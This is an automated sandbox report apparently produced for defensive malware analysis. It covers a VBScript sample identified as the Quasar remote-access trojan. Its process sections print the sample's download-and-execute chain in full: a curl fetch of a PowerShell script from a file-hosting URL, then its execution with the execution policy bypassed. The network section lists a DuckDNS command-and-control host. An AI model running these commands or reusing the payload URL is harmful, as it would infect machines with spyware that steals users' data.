Malware Analysis Report

2025-04-14 05:07

Sample ID 230116-llw4zada92
Target asd.vbs
SHA256 7bf8ea91da860789333adacd1cc7b26ffb593dfe6ebab4651a789bf47d0b92ba
Tags
quasar office04 spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7bf8ea91da860789333adacd1cc7b26ffb593dfe6ebab4651a789bf47d0b92ba

Threat Level: Known bad

The file asd.vbs was found to be: Known bad.

Malicious Activity Summary

quasar office04 spyware trojan

Quasar RAT

Quasar payload

Checks computer location settings

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-16 09:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-16 09:37

Reported

2023-01-16 09:40

Platform

win7-20221111-en

Max time kernel

30s

Max time network

33s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 532 wrote to memory of 272 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 532 wrote to memory of 272 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 532 wrote to memory of 272 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 272 wrote to memory of 764 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 272 wrote to memory of 764 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 272 wrote to memory of 764 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 532 wrote to memory of 1820 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 532 wrote to memory of 1820 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 532 wrote to memory of 1820 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 1820 wrote to memory of 772 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 772 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 772 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 772 wrote to memory of 1616 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 772 wrote to memory of 1616 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 772 wrote to memory of 1616 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

Network

N/A

Files

memory/532-54-0x000007FEFC191000-0x000007FEFC193000-memory.dmp

memory/272-55-0x0000000000000000-mapping.dmp

memory/764-56-0x0000000000000000-mapping.dmp

memory/1820-57-0x0000000000000000-mapping.dmp

memory/772-58-0x0000000000000000-mapping.dmp

memory/1616-59-0x0000000000000000-mapping.dmp

memory/1616-61-0x000007FEF4170000-0x000007FEF4B93000-memory.dmp

memory/1616-62-0x000007FEF3610000-0x000007FEF416D000-memory.dmp

memory/1616-63-0x00000000023C4000-0x00000000023C7000-memory.dmp

memory/1616-64-0x00000000023C4000-0x00000000023C7000-memory.dmp

memory/1616-65-0x00000000023CB000-0x00000000023EA000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-16 09:37

Reported

2023-01-16 09:40

Platform

win10v2004-20220901-en

Max time kernel

36s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | api.ipify.org | N/A | N/A
N/A | api.ipify.org | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3384 set thread context of 1128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4956 wrote to memory of 4624 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 4956 wrote to memory of 4624 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 4624 wrote to memory of 2460 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4624 wrote to memory of 2460 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2460 wrote to memory of 628 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 2460 wrote to memory of 628 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 4956 wrote to memory of 2256 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 4956 wrote to memory of 2256 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2256 wrote to memory of 5092 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2256 wrote to memory of 5092 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 5092 wrote to memory of 3384 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 3384 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3384 wrote to memory of 1128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\curl.exe

curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country | Destination | Domain | Proto
N/A | 8.8.8.8:53 | files.catbox.moe | udp
N/A | 107.160.74.134:443 | files.catbox.moe | tcp
N/A | 8.8.8.8:53 | ghcc.duckdns.org | udp
N/A | 95.216.102.32:4782 | ghcc.duckdns.org | tcp
N/A | 8.8.8.8:53 | tools.keycdn.com | udp
N/A | 185.172.148.96:443 | tools.keycdn.com | tcp
N/A | 8.8.8.8:53 | api.ipify.org | udp
N/A | 64.185.227.155:443 | api.ipify.org | tcp
N/A | 20.189.173.12:443 | | tcp
N/A | 8.8.8.8:53 | 96.108.152.52.in-addr.arpa | udp
N/A | 8.8.8.8:53 | d.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.5.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa | udp

Files

memory/4624-132-0x0000000000000000-mapping.dmp

memory/2460-133-0x0000000000000000-mapping.dmp

memory/628-134-0x0000000000000000-mapping.dmp

memory/2256-135-0x0000000000000000-mapping.dmp

memory/5092-136-0x0000000000000000-mapping.dmp

memory/3384-137-0x0000000000000000-mapping.dmp

memory/3384-138-0x0000019ECFD30000-0x0000019ECFD52000-memory.dmp

C:\Users\Admin\AppData\Roaming\rr.ps1

MD5 7aad8bcb11ff3deab23cc311222fe265
SHA1 3d9a69c71e00aff947af949441220f18bad9e0d8
SHA256 c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a
SHA512 f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9

memory/3384-140-0x00007FFC46E80000-0x00007FFC47941000-memory.dmp

memory/1128-141-0x0000000000400000-0x0000000000484000-memory.dmp

memory/1128-142-0x000000000047E7AE-mapping.dmp

memory/3384-143-0x00007FFC46E80000-0x00007FFC47941000-memory.dmp

memory/1128-144-0x0000000005B50000-0x00000000060F4000-memory.dmp

memory/1128-145-0x00000000055A0000-0x0000000005632000-memory.dmp

memory/1128-146-0x0000000005500000-0x000000000550A000-memory.dmp

memory/1128-147-0x0000000006820000-0x0000000006E38000-memory.dmp

memory/1128-148-0x0000000006250000-0x00000000062A0000-memory.dmp

memory/1128-149-0x0000000006480000-0x0000000006532000-memory.dmp

memory/1128-150-0x0000000007820000-0x0000000007886000-memory.dmp